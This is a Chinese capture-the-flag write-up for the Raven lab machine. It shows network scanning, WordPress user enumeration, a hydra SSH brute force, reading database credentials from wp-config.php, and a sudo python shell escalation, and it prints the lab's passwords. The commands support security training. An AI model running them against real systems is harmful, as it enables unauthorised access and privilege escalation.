靶机5 Raven

本文描述了一次IT渗透过程,包括使用arp-scan和nmap进行网络探测,发现并利用PHPMailer与SSH漏洞,通过wpscan枚举用户,使用hydra暴力破解,最终获取MySQL凭证并提权。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Raven(乌鸦)

1.信息收集

使用arp-scan确定目标目标靶机

arp-scan -l            扫描

nmap详细扫描

nmap -sV -p- 10.9.47.141 -T4 

访问目标靶机80端口

service.html页面的源码里,

成功获得了第一个flag

扫描目录

dirb http://10.9.47.141

查看

http://10.9.47.141/vendor/

点击README.md发现此网站安装了PHPMailer,并且版本号为5.2.16

因为开放22端口

2.渗透过程

使用wpscan枚举一下用户

wpscan --url http://raven.local/wordpress/ -e u

找到两个用户

用两个用户组成用户字典dc_2

使用hydra(九头蛇)爆破

hydra -L dc_2 -P /usr/share/wordlists/rockyou.txt ssh://10.9.47.141 -V -f

ssh登录

ssh michael@10.9.47.141

在/var/www/路径下面成功获得flag2

MySQL数据库

进入/var/www/html/wordpress/路径下,查看wp-config.php文件,成功获得mysql的账号密码

进入mysql数据库,选择wordpress库

mysql -uroot -pR@v3nSecurity



用户:root
密码:R@v3nSecurity

查看wordpress库

use wordpress;

show tables;

查看wp_posts表中内容

找到flag3和flag4

select * from wp_posts

查看wp_users表中的内容

发现两个用户账号密码,但是密码是加密过

select * from wp_users;

明显的MD5加密

切换用户

michael@Raven:/var/www/html/wordpress$ su steven
Password: 
$ id
uid=1001(steven) gid=1001(steven) groups=1001(steven)
$ 


账户:steven
密码:pink84

3.sudo提权

查看sudo权限

sudo -l

提权

sudo /usr/bin/python -c 'import pty; pty.spawn("/bin/bash")'

成功

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值